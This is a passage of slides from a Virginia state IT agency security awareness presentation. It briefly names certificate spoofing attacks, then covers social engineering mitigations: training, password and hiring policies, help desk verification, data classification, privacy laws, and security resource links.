    exact same domain name as the targeted site
  • This technique utilizes a Man-in-the-Middle
    attack and uses the null-character certificate to
    create its false certificates as needed
  • Leading zero attack
  • Similar to the NULL Character attack
  • The certificate will attach an invisible zero to
    the first hex character in the certificate

153
Social Engineering Mitigation Methods
  • User Security Awareness and Training
  • Policies
  • Procedures

154
Security Awareness Training
  • Increases the understanding of security and the
    threat of Social Engineering
  • Training should occur during employee enrollment
    and at regular intervals
  • Training could be outsourced to a third-party
    since many employees consider third-party input
    to be more important

155
Email Security Awareness Training
  • The best mitigation mechanism for SPAM and
    Phishing emails is the delete button
  • To mitigate the potential threat presented by a
    spam email campaign, it is recommended that you
    remind your users to never open attachments or
    click links contained in unsolicited email
    messages
  • Advise them, if possible, to check with the
    person who supposedly sent the email to make sure
    that it is legitimate prior to opening any
    attachments
  • Scan any attachments at the network perimeter as
    well as the desktop with anti-virus software
    before opening the attachment
  • Never use the contact information provided on a
    web site connected directly to the email request

156
Email Security Awareness Training
  • Also advise users not to reveal personal or
    financial information in an email, and not to
    respond to email solicitations for this
    information
  • Always examine the URL of a web site. Malicious
    web sites may look identical to a legitimate
    site, but the URL may use a variation in spelling
    or a different domain extension such as .com vs.
    .net
  • An additional step to help mitigate the risk of a
    phishing campaign is to limit the administrative
    rights of the local users through the
    implementation of the Least-Privileged best
    practice
  • Only display functional/group email addresses on
    public websites to limit the amount of
    SPAM/Phishing emails sent to individuals

157
Physical Security Awareness Training
  • Ensure all visitors are always escorted
  • Remind employees not to allow Piggy-Back access
  • Remind employees not to allow an unknown person
    to wander the facility
  • Never allow a visitor, client, or other persons
    to simply connect a computer to the internal
    network without prior approval

158
Credential Security Awareness Training
  • Protection of account credentials
  • Never give out or share passwords
  • Use strong passwords for any application
    requiring a login
  • Use unique passwords for every application and
    avoid using the same password for similar
    applications
  • Carefully consider the questions used to verify
    the user for automated password resets
  • Most automated systems use a common set of
    questions for password reset and the answers to
    these questions can be found in public records or
    on-line
  • Place of birth, mothers maiden name, and school
    information are available in public records
  • Friends, color preference, hobbies, and pet
    information often found on Social Network sites
  • Make of first car can be guessed based on
    purchasing trends

159
Identity Security Awareness Training
  • Protection of Personal Identifiable Information
    within Social Networks
  • Select your screen name carefully do not
    include any information such as your name, age,
    sex, city, or employer
  • Never post anything you would not want to have
    distributed publicly
  • Never post personally identifying information
    such as SSN, first and last name, address,
    drivers license, telephone number and e-mail
    address
  • When establishing your account, adjust your
    profile until you are comfortable with the amount
    of protection provided to maximize your security

160
Policies
  • Must clarify information access controls
  • Detail rules for setting up accounts
  • Define access approval
  • Define process for changing passwords

161
Policies
  • Define policy for physical destruction of devices
    and media
  • Hard Drives
  • CD/DVDs
  • Define physical control selection and
    implementation
  • Locks
  • Access controls
  • How visitors are authorized and escorted

162
Employee Hiring and Termination Policies
  • Hiring should include background checks,
    verifying educational records, and Non-Disclosure
    Agreements
  • Termination should include exit interviews,
    review of NDA, suspension of network access, and
    checklist for equipment return

163
Help Desk Procedures
  • Used to make sure that there is a standard
    procedure for employee verification
  • Caller-ID or employee call-back can be used to
    verify caller
  • Can also use Cognitive Passwords
  • Arcane information that only the user should know

164
Password Change Policy
  • Require strong passwords
  • Must not contain any part of account name
  • Must be at least 8-characters long
  • Must contain at least three or four
  • Numbers
  • Uppercase letters
  • Lowercase letters
  • Non-alphanumeric symbols
  • Require password aging
  • Prohibit password reuse

165
Employee Identification
  • ID badges give a clear indication of authorized
    personnel
  • Guests should also wear temporary ID badges
  • Guests should be required to sign-in and sign-out
  • Anyone without a badge should be questioned and
    escorted to the proper facility personnel

166
Privacy Policies
  • Employees and customers have a certain
    expectation with regard to privacy
  • The privacy policy should be posted on the public
    website

167
Laws and Regulations
  • 4th Amendment to the Unites States Constitution
  • Electronic Communications Privacy Act of 1986
  • Protects email and voice communications
  • HIPPA (Health Insurance Portability and
    Accountability Act)
  • Family Education Rights and Privacy Act
  • Privacy rights to students over 18
  • European Union Privacy Law
  • Protects personal data

168
Data Classification Systems
  • Can help prevent Social Engineering
  • Can be used to define what information is most
    critical
  • Can be used to gain end-user compliance
  • Governmental Information Classification System
  • Designed to protect confidentiality of
    information
  • Commercial Information Classification System
  • Focused on the integrity of information

169
Governmental Information Classification System
  • Unclassified
  • Information is not sensitive and does not need to
    be protected
  • The loss of information would not cause damage
  • Confidential
  • Information is sensitive and the disclosure could
    result in some damage
  • Will require a safeguard against disclosure
  • Secret
  • Information that is classified as secret has a
    greater important than confidential data
  • Disclosure would result in serious damage
  • May result in loss of significant scientific or
    technical development
  • Top-Secret
  • Information that requires the most protection
  • Disclosure would be catastrophic

170
Commercial Information Classification System
  • Public
  • Similar to unclassified information
  • Disclosure would not result in damage
  • Sensitive
  • Information requires controls to prevent the
    release to unauthorized parties
  • Disclosure would result in some damage
  • Private
  • Information is primary personal in nature
  • Can include employee or medical records
  • Confidential
  • Information has the most sensitive rating
  • Information is required to keep the company
    competitive
  • The information should never be released

171
Commonwealth Security Information Resource Center
  • http//www.csirc.vita.virginia.gov
  • Two Main Goals
  • Create a place to provide security information
    that is relative to the Commonwealth
  • Includes security topics within the COV
    government
  • Addresses topics for those with interests in the
    security community
  • Citizens, businesses, other states, etc.
  • Create a source for providing threat data to
    third parties
  • Summary threat data for public viewing
  • Detailed threat data available for appropriate
    parties

172
Security Information
  • Types of information posted
  • Security advisories
  • Advisories affecting the Commonwealth government
    computing environment
  • Phishing scams
  • Attempts to gather information from users that
    will be useful for malicious activity
  • Information security tips
  • How to integrate security into daily activity
  • News
  • The latest news about information security that
    would be useful to the government and its
    constituents
  • Threat data
  • Information showing statistics about the top
    attackers targeting the Commonwealth.

173
Security Research URLs
  • Internet Storm Center
  • http//isc.sans.org/
  • SANS Reading Room
  • https//www.sans.org/reading_room/
  • OWASP
  • http//www.owasp.org/index.php/Main_Page
  • Security Focus
  • http//www.securityfocus.com/
  • US-CERT
  • http//www.us-cert.gov
  • Team Cymru
  • http//www.team-cymru.org/

174
Questions???
  • For more information, please contact
    CommonwealthSecurity_at_VITA.Virginia.Gov
  • For more information on topics discussed in this
    presentation
  • Bob.Baskette_at_VITA.Virginia.GOV
  • Thank You!
About PowerShow.com